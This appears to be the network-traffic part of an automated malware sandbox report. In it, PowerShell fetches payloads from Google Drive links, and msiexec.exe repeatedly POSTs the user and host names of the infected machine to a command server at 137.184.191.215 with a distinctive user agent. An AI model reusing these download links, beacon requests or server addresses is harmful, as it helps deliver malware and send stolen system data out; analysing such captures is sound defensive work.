                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:16.036878109 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:16.036887884 CEST  1236  IN
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:16.038016081 CEST  142  IN
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        23          192.168.2.4  59107        137.184.191.215  80                8076  C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        Oct 2, 2024 07:20:16.189989090 CEST  258  OUT  POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:16.194834948 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:19.692133904 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:19.692466974 CEST  1236  IN
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:19.692480087 CEST  366  IN
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                        Oct 2, 2024 07:20:19.693748951 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:19.693762064 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        24          192.168.2.4  59108        137.184.191.215  80                8076  C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        Oct 2, 2024 07:20:19.859668970 CEST  258  OUT  POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:19.864464998 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:22.538747072 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:20 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:22.539127111 CEST  224  IN
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:22.539135933 CEST  1236  IN
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:22.540229082 CEST  142  IN
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        25          192.168.2.4  59109        137.184.191.215  80                8076  C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        Oct 2, 2024 07:20:22.693000078 CEST  258  OUT  POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:22.698157072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:25.272121906 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:23 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:25.272531986 CEST  224  IN
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:25.272542000 CEST  1236  IN
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:25.273087978 CEST  142  IN
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        26          192.168.2.4  59110        137.184.191.215  80                8076  C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        Oct 2, 2024 07:20:25.428327084 CEST  258  OUT  POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:25.433687925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:28.120699883 CEST  1236  IN  HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:25 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:28.121135950 CEST  1236  IN
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:28.121146917 CEST  366  IN
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        0           192.168.2.4  49730        172.217.18.14   443               7408  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        2024-10-02 05:18:24 UTC  215  OUT  GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:24 UTC  1610  IN  HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:18:24 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'nonce-AjdkBo8IFCx3tbZN86YLAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        1           192.168.2.4  49731        172.217.18.14   443               7408  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        2024-10-02 05:18:29 UTC  121  OUT  GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:30 UTC  1319  IN  HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:18:29 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kYJxPlj0OAb3IAThFCEXGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.4 | 49732 | 142.250.186.33 | 443 | 7408 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-02 05:18:30 UTC | 139 | OUT | GET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:33 UTC | 4851 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="Catrine.pfb"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 468128
                                        Last-Modified: Mon, 30 Sep 2024 03:52:44 GMT
                                        X-GUploader-UploadID: AD-8ljsj19DS8BH25B1LGTGXkbKSGWGEUd_QotDDHk1K8bKiCNE0SfHjib8Gtd2IeGGkzS7qSZfAkVMSTQ
                                        Date: Wed, 02 Oct 2024 05:18:33 GMT
                                        Expires: Wed, 02 Oct 2024 05:18:33 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=7/JiXg==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.4 | 59082 | 172.217.18.110 | 443 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-02 05:19:04 UTC | 216 | OUT | GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-10-02 05:19:05 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:19:05 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Cross-Origin-Opener-Policy: same-origin
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Content-Security-Policy: script-src 'nonce-fUsFJEFEND24o86MUoRH9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.4 | 59083 | 142.250.186.161 | 443 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-02 05:19:05 UTC | 258 | OUT | GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:19:08 UTC | 4859 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="sLgRDOfJZMJPu27.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 106560
                                        Last-Modified: Mon, 30 Sep 2024 03:50:27 GMT
                                        X-GUploader-UploadID: AD-8ljuWSCsPe3F9Xw5RPHhN-mpVxLyii7yHD2hHTgKaK8Q9695n6QdKkralx-Fg6uhCw2cSHzkU9843Rw
                                        Date: Wed, 02 Oct 2024 05:19:08 GMT
                                        Expires: Wed, 02 Oct 2024 05:19:08 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=p83L0w==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close



                                        Target ID:0
                                        Start time:01:18:18
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
